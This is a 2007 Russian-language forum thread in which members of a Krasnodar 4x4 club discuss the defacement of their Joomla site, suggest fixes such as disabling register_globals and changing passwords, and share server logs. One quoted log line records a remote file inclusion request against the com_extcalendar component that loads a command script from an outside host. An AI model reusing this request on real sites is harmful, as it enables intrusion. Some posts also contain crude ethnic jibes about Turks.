Страница 1 из 1
Наш сайт хакнули. :(
Добавлено: 21.03.2007, 10:39
БАRМАLЕЙ
Главной страницы больше нет.
http://www.4x4krasnodar.ru/
Турки проклятые.
Добавлено: 21.03.2007, 10:44
135
Турки, сука, молодцы
) растут в проф плане. Совсем недавно вообще лохи были, а теперь вишь, уже хакают помалу %-)))))
Кстати они не должны были мочкануть главную страницу, скорее всего просто повесили свой индекс.
Добавлено: 21.03.2007, 10:53
igor4737
Ну да, точгно индекс, админ ау! Верни как надо!
Добавлено: 21.03.2007, 10:54
Kosh
igor4737 писал(а):Ну да, точгно индекс, админ ау! Верни как надо!
Не волнуйтесь. Вернёт как сможет.
Добавлено: 21.03.2007, 10:55
BELL
KEE, первым делом поищи .htaccess в корне с редиректом
если нет - разбирайся
а я тебя на днях предупреждал. Мне повезло - мой сайт использовали как хостинг для скриптов для кражи кредитных карт американцы - вовремя просек и прикрыл.
Никак жумлу включили в популярный сканер?
Добавлено: 21.03.2007, 10:58
BELL
А дизайнеры из турков низачОтные нифига
Добавлено: 21.03.2007, 11:25
tolik777
А причину нашли каким образом взломали? Где-то же находиться дырявый скрипт и надо дыру эту прикрыть.
И главное проверить все директории сайта - не оставили шелл какой-ниубдь. Т.к. обычно оставляют.
Добавлено: 21.03.2007, 11:30
Токайдзин
Пардон, чем это грозит? Инфа потеряна? Хозяин хостинга несет ответственность?
Добавлено: 21.03.2007, 11:31
Oktan
Я уверен, основная причина - свежая дырка в Джумле.
Есть несколько вариантов:
1. турки - порядочные хакеры, забэкапили сайт, подменили только индексовую страницу.
2. турки - немного скоты, снесли все файлы на винте сервера, базу не тронули.
3. турки - полные уроды, снесли все, что относится к движку САЙТА.
Я больше склоняюсь ко второму варианту, раз форум жив, значит базу не трогали.
Добавлено: 21.03.2007, 11:32
135
Да никто ничего не бакапил, просто индексную страницу переписали.
Стопудово даже в .htaccess никто не лазил - оно им надо? Доступ получили, страничку повесили и бегом радоваться.
Ничем не грозит. Ничего же ценного не лежит там?
Добавлено: 21.03.2007, 11:52
Гендель
не ну не уроды а?? лучше бы какойнить другой посерьезней зашишенный сайт грохнули хоть пацпнами-бы нормальными выглядели ну Краевой адменистации или МВД ну вообшем сурьезней. а так хулиганы пакостники непойми чего добились.
Добавлено: 21.03.2007, 11:57
BELL
135 писал(а):даже в .htaccess никто не лазил
я не смог достучаться до некоторых основных скриптов сайта. Нет, это хтаццесс, стопудов.
стопудово com_joomlaexplorer ломали - в нем есть дырки. Я его просто убил у себя - я им не пользуюсь.[/list]
Добавлено: 21.03.2007, 11:58
BELL
Гендель писал(а):Краевой адменистации или МВД
Не смеши
их неломают потому что хтмл, набросанный в ворде - там скриптов то нет
максимум - для сборки хтмл модулей воедино - тож неломаеццо
кстати турки тож дреамвьювером пользуются
Добавлено: 21.03.2007, 12:01
135
BELL, не свети прошлое
Может и акцесс -))), вскрытие покажет
имхо жмуля не единственный возможный вариант. Не про конкретно сейчас а вообще.
Добавлено: 21.03.2007, 12:06
BELL
да эт понятно
учитывая что компонентов немеряно левых, которые непонятно кто разрабатывал. Сам боюсь
но хостера врядли. Мастерхост же!!
Добавлено: 21.03.2007, 12:09
Гендель
BELL писал(а):Гендель писал(а):Краевой адменистации или МВД
Не смеши
их неломают потому что хтмл, набросанный в ворде - там скриптов то нет
максимум - для сборки хтмл модулей воедино - тож неломаеццо
кстати турки тож дреамвьювером пользуются
не ну ладно я не так уж хорошо разбираюсь во всем этом. просто высказал свои имоции.. Считай что пристыдил, буду на досуге пичитавать самоучитель какойнибудь по хтмл
Добавлено: 21.03.2007, 12:10
БАRМАLЕЙ
Обидно на!
Почему бы Евгению не дать порядочным людям возможность оперативно реагировать на такие вещи (Беллу или Костегу например) ??????
Добавлено: 21.03.2007, 12:13
135
колхоз - зло.
Добавлено: 21.03.2007, 12:13
БАRМАLЕЙ
135 писал(а):колхоз - зло.
злость - зло.
Добавлено: 21.03.2007, 12:14
135
не понял к чему злость? Я просто высказал своё мнение что колхоз ни к чему хорошему не приведёт.
Добавлено: 21.03.2007, 12:16
BELL
БARMALEЙ
админ должен быть один
это - ЗАКОН
Добавлено: 21.03.2007, 12:34
BELL
в тему:
http://ru-mambo.ru/smf/index.php?action=printpage;topic=17157.0КЕЕ, скорее всего я ошибался
вот она дырка, в календаре
щас буду разбираться (
Добавлено: 21.03.2007, 12:47
BELL
Так, КЕЕ
ставь в .htaccess строчки
Код: Выделить всё
php_flag register_globals off
php_flag magic_quotes_gpc onв globals.php ставь 0
все работает вроде
и по мелочам тут
http://joomlaportal.ru/content/view/952/70/
Добавлено: 21.03.2007, 13:15
BELL
да, и естественно смена всех паролей, включая бд.
Щас нашел файл на своем хостинге - ломали тож через дыру в календаре, так он перебирает всех клиентов и брутфорсит пароли, причом исполняется на хостера же серваке. Большой плюс - ограничение времени работы всех скриптов 30 сек. Надеюсь, много подобрать он не успел
Добавлено: 21.03.2007, 13:30
Токайдзин
Эй, хирурги!!?
Больной ходить будет?
Ps: Турок, - он, сцуко, подлый... Мочи козлов!
Добавлено: 21.03.2007, 13:43
135
При чём тут турок?
Добавлено: 21.03.2007, 14:33
BELL
Мля, класика, как в книгах
исполнили скрипт
Код: Выделить всё
172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:47:27 +0300] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 1409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" смотрели результат своих действий (скрипта ихнего)
Код: Выделить всё
172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:48:28 +0300] "GET /components/com_extcalendar/scan/index.html HTTP/1.1" 200 2267 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" ниасилил
Код: Выделить всё
172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:49:30 +0300] "GET /components/com_extcalendar/scan/google.php?q=Busca:%20inurl:agendax= HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Судя по всему, нихто не попался на удочку (кроме меня, я проверял что будет)
Код: Выделить всё
62.183.13.169 kuban4x4.ru - - [19/Mar/2007:18:54:36 +0300] "GET /components/com_extcalendar/militarybankonline.bankofamerica.com HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; MRA 4.6 (build 01425); .NET CLR 1.1.4322)" вот так оно, товарищи!
Добавлено: 21.03.2007, 14:43
135
Офигеть, школьники из швеции -))))
° Ср 21-Мар-2007 14:43:40,
Наш сайт хакнули.
- 135
° Ср 21-Мар-2007 12:04:21,
СТЫД И СРАМ! (и низачот) - Гендель
° Ср 21-Мар-2007 11:32:17,
Заберите этот хлам! Даже в Краснодар привезу! - Alex A. Bel.
не подумайте плохо
Добавлено: 21.03.2007, 15:35
БАRМАLЕЙ
135 писал(а):Офигеть, школьники из швеции -))))
° Ср 21-Мар-2007 14:43:40, Наш сайт хакнули. - 135
° Ср 21-Мар-2007 12:04:21, СТЫД И СРАМ! (и низачот) - Гендель
° Ср 21-Мар-2007 11:32:17, Заберите этот хлам! Даже в Краснодар привезу! - Alex A. Bel.
не подумайте плохо
никак не пойму, что ты этим хотел сказать? Расшифруй.
Добавлено: 21.03.2007, 15:42
135
просто игра слов...
Добавлено: 21.03.2007, 16:54
Alex A. Bel.
АфффигетЬ! вот теперь я ещё и шведский школьник
Добавлено: 21.03.2007, 16:55
БАRМАLЕЙ
Alex A. Bel. привыкай...
Добавлено: 21.03.2007, 17:04
135
Да ладно тупого включать %-)
шведские школьники это -
www.grodmansskolan.se
Добавлено: 21.03.2007, 18:34
Гендель
и что?? я наверное действитель шведский школьник потому что ваашене понял..
Добавлено: 21.03.2007, 19:09
nejimaki-dori
Гы!
тады не шведские,а эстонские!
Гендель,не в обиду
(против эстонцев тож ничего не имею!)
Добавлено: 21.03.2007, 20:31
BELL
Долго они добирались до сайта ))
Добавлено: 21.03.2007, 22:06
733
Ура-а-а-а-а-а-а!!!!!. Женя всё востановил. Наверно хакнули по первому варианту.
Добавлено: 21.03.2007, 22:38
doctor
733 писал(а):Ура-а-а-а-а-а-а!!!!!. Женя всё востановил. Наверно хакнули по первому варианту.
Тогда пусть сразу ставит защиту от прочих вариантов!
Добавлено: 22.03.2007, 09:29
БАRМАLЕЙ
Добавлено: 22.03.2007, 14:50
BELL
я был неправ - переписали конфиг
эффект тот же самый как и при редиректе - конфиг инкляйдится во все скрипты без исключения. Вотт такк, однако
Жень, все таки постарайся глобалс выключить. Надо.